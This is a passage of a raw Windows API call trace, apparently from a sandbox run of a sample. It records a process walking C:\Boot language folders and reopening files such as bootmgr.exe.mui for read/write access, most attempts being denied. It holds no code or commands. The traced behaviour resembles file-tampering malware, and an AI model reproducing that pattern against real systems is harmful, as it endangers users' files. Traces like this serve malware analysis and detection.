hHeap=0x20000) returned 1 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.534] AreFileApisANSI () returned 1 [0069.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-GB", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-GB", lpUsedDefaultChar=0x0) returned 14 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0069.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.535] AreFileApisANSI () returned 1 [0069.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0069.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-GB") returned 14 [0069.535] CreateFileW (lpFileName="C:\\Boot\\en-GB" (normalized: "c:\\boot\\en-gb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.535] GetLastError () returned 0x5 [0069.535] GetLastError () returned 0x5 [0069.535] SetLastError (dwErrCode=0x5) [0069.535] GetLastError () returned 0x5 [0069.535] SetLastError (dwErrCode=0x5) [0069.535] GetLastError () returned 0x5 [0069.535] SetLastError (dwErrCode=0x5) [0069.535] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.535] AreFileApisANSI () returned 1 [0069.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.535] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0069.535] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-GB") returned 14 [0069.535] CreateFileW (lpFileName="C:\\Boot\\en-GB" (normalized: "c:\\boot\\en-gb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.535] GetLastError () returned 0x5 [0069.535] GetLastError () returned 0x5 [0069.536] SetLastError (dwErrCode=0x5) [0069.536] GetLastError () returned 0x5 [0069.536] SetLastError (dwErrCode=0x5) [0069.536] GetLastError () returned 0x5 [0069.536] SetLastError (dwErrCode=0x5) [0069.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.536] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.536] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-US", cAlternateFileName="")) returned 1 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0069.536] FindFirstFileExW (in: lpFileName="C:\\Boot\\en-GB\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x783d0 [0069.536] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.536] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12158, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.536] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.536] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0069.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0069.537] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.537] AreFileApisANSI () returned 1 [0069.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-GB\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-GB\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.537] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.537] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.538] AreFileApisANSI () returned 1 [0069.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.538] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0069.538] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 30 [0069.538] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.538] GetFileType (hFile=0x418) returned 0x1 [0069.538] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.538] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.538] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.538] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.539] CloseHandle (hObject=0x418) returned 1 [0069.539] AreFileApisANSI () returned 1 [0069.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0069.539] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\en-GB\\bootmgr.exe.mui") returned 30 [0069.539] CreateFileW (lpFileName="C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.539] GetLastError () returned 0x5 [0069.539] GetLastError () returned 0x5 [0069.539] SetLastError (dwErrCode=0x5) [0069.539] GetLastError () returned 0x5 [0069.539] SetLastError (dwErrCode=0x5) [0069.539] GetLastError () returned 0x5 [0069.539] SetLastError (dwErrCode=0x5) [0069.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.539] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.539] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.539] FindNextFileW (in: hFindFile=0x783d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68d68, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⅘\x01⺊Ā")) returned 0 [0069.539] FindClose (in: hFindFile=0x783d0 | out: hFindFile=0x783d0) returned 1 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.540] AreFileApisANSI () returned 1 [0069.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\en-US", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\en-US", lpUsedDefaultChar=0x0) returned 14 [0069.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.540] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.541] AreFileApisANSI () returned 1 [0069.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0069.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-US") returned 14 [0069.541] CreateFileW (lpFileName="C:\\Boot\\en-US" (normalized: "c:\\boot\\en-us"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.541] GetLastError () returned 0x5 [0069.541] GetLastError () returned 0x5 [0069.541] SetLastError (dwErrCode=0x5) [0069.541] GetLastError () returned 0x5 [0069.541] SetLastError (dwErrCode=0x5) [0069.541] GetLastError () returned 0x5 [0069.541] SetLastError (dwErrCode=0x5) [0069.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.541] AreFileApisANSI () returned 1 [0069.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.541] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0069.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\en-US") returned 14 [0069.541] CreateFileW (lpFileName="C:\\Boot\\en-US" (normalized: "c:\\boot\\en-us"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.541] GetLastError () returned 0x5 [0069.541] GetLastError () returned 0x5 [0069.541] SetLastError (dwErrCode=0x5) [0069.542] GetLastError () returned 0x5 [0069.542] SetLastError (dwErrCode=0x5) [0069.542] GetLastError () returned 0x5 [0069.542] SetLastError (dwErrCode=0x5) [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.542] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.542] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.542] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4853f40, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa000b9ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef586d37, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.542] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0069.542] FindFirstFileExW (in: lpFileName="C:\\Boot\\en-US\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0069.542] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef57d0f5, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef57d0f5, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.542] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, 